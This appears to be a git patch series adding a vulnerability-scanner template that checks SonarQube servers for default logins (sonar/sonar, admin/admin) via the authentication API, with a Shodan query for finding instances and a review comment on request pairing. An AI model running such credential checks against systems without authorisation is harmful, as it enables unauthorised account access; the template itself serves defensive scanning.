From a5e06fd3802a1d9f9d0ba2928050a0ae47bb68e0 Mon Sep 17 00:00:00 2001
From: dcruzec
Date: Tue, 11 Jul 2023 17:34:55 -0400
Subject: [PATCH 1/4] Add files via upload

This template checks if Sonarqube assets take in default credentials
---
.../sonarqube-default-credentials.yaml | 32 +++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 http/misconfiguration/sonarqube-default-credentials.yaml

diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/misconfiguration/sonarqube-default-credentials.yaml
new file mode 100644
index 0000000000..81d1debd65
--- /dev/null
+++ b/http/misconfiguration/sonarqube-default-credentials.yaml
@@ -0,0 +1,32 @@
+id: sonarqube-default-credential
+info:
+ name: Sonarqube Default Credential Login
+ author: Ep1cSage
+ severity: critical
+ description: description
+ reference:
+ - https://docs.sonarsource.com/sonarqube/9.6/instance-administration/security/#:~:text=When%20installing%20SonarQube%2C%20a%20default,Password%3A%20admin
+ tags: sonarqube
+
+requests:
+ - raw:
+ - |-
+ POST /api/authentication/login HTTP/1.1
+ Host: {{Hostname}}
+ Referer: http://{{Hostname}}:9000/sessions/new
+ Content-Type: application/x-www-form-urlencoded
+ Origin: http://{{Hostname}}:9000
+
+ {{credentials}}
+
+ attack: batteringram
+ payloads:
+ credentials:
+ - login=sonar&password=sonar
+ - login=admin&password=admin
+
+ matchers:
+ - type: word
+ part: header
+ words:
+ - HTTP/1.1 200
From 20803cbf4bdbcf15a2113a334b60a7eee6f73a71 Mon Sep 17 00:00:00 2001
From: dcruzec
Date: Tue, 11 Jul 2023 17:39:23 -0400
Subject: [PATCH 2/4] Update sonarqube-default-credentials.yaml

---
http/misconfiguration/sonarqube-default-credentials.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/misconfiguration/sonarqube-default-credentials.yaml
index 81d1debd65..f3bc20a766 100644
--- a/http/misconfiguration/sonarqube-default-credentials.yaml
+++ b/http/misconfiguration/sonarqube-default-credentials.yaml @@ -13,9 +13,9 @@ requests: - |- POST /api/authentication/login HTTP/1.1 Host: {{Hostname}} - Referer: http://{{Hostname}}:9000/sessions/new + Referer: http://{{Hostname}}/sessions/new Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}}:9000 + Origin: http://{{Hostname}} {{credentials}} From 1c999a0b92cc0cc632e3c9ac67a353853ae07224 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Jul 2023 09:27:52 +0530 Subject: [PATCH 3/4] updated req,matcher,info --- .../sonarqube-default-credentials.yaml | 57 ++++++++++++------- 1 file changed, 35 insertions(+), 22 deletions(-) diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/misconfiguration/sonarqube-default-credentials.yaml index f3bc20a766..1a8e033d59 100644 --- a/http/misconfiguration/sonarqube-default-credentials.yaml +++ b/http/misconfiguration/sonarqube-default-credentials.yaml 
@@ -1,32 +1,45 @@ -id: sonarqube-default-credential +id: sonarqube-default-login + info: - name: Sonarqube Default Credential Login + name: SonarQube Default Login - Detect author: Ep1cSage - severity: critical - description: description - reference: + severity: high + description: | + SonarQube contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: - https://docs.sonarsource.com/sonarqube/9.6/instance-administration/security/#:~:text=When%20installing%20SonarQube%2C%20a%20default,Password%3A%20admin - tags: sonarqube - -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 4 + verified: true + shodan-query: title:"Sonarqube" + tags: default-login,sonarqube + +http: - raw: - - |- + - | POST /api/authentication/login HTTP/1.1 Host: {{Hostname}} - Referer: http://{{Hostname}}/sessions/new Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - {{credentials}} - - attack: batteringram + login={{username}}&password={{password}} + + attack: clusterbomb payloads: - credentials: - - login=sonar&password=sonar - - login=admin&password=admin - + username: + - sonar + - admin + password: + - sonar + - admin + matchers: - - type: word - part: header - words: - - HTTP/1.1 200 + - type: dsl + dsl: + - 'status_code == 200' + - 'len(body) == 0' + - 'contains(set_cookie, "JWT-SESSION=")' + condition: and From ae5c9fe556b08d88ab20aa0901e4fd47b0607fa0 Mon Sep 17 00:00:00 2001 
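Review bot: `attack: clusterbomb` submits every username with every password, so in addition to the two pairs the first patch listed (`sonar`/`sonar` and `admin`/`admin`) the template now also tries `sonar`/`admin` and `admin`/`sonar`, and the reference URL's text fragment only mentions the `admin` default. Those extra attempts are guaranteed-wrong logins that add authentication-failure noise on the scanned instance and may count toward any lockout or rate limit in front of it. Pairing the two lists instead, with `attack: pitchfork`, `max-request: 2` in `metadata`, and `stop-at-first-match: true` on the request block, keeps the check to the listed pairs and stops after the first hit.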
From: Dhiyaneshwaran
Date: Wed, 12 Jul 2023 10:35:52 +0530
Subject: [PATCH 4/4] Rename http/misconfiguration/sonarqube-default-credentials.yaml to http/default-logins/sonarqube/sonarqube-default-login.yaml

---
.../sonarqube/sonarqube-default-login.yaml} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename http/{misconfiguration/sonarqube-default-credentials.yaml => default-logins/sonarqube/sonarqube-default-login.yaml} (100%)

diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/default-logins/sonarqube/sonarqube-default-login.yaml
similarity index 100%
rename from http/misconfiguration/sonarqube-default-credentials.yaml
rename to http/default-logins/sonarqube/sonarqube-default-login.yaml